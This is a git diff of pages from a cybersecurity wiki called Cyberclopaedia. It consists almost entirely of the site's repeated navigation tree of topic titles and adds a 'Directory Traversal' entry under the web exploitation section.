      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -248,22 +248,6 @@

Trusts

- - diff --git a/docs/System Internals/Windows/File System.html b/docs/System Internals/Windows/File System.html index b213a7b6..f21cae60 100644 --- a/docs/System Internals/Windows/File System.html +++ b/docs/System Internals/Windows/File System.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -223,22 +223,6 @@

Working w - - diff --git a/docs/System Internals/Windows/index.html b/docs/System Internals/Windows/index.html index e1503757..236baac6 100644 --- a/docs/System Internals/Windows/index.html +++ b/docs/System Internals/Windows/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
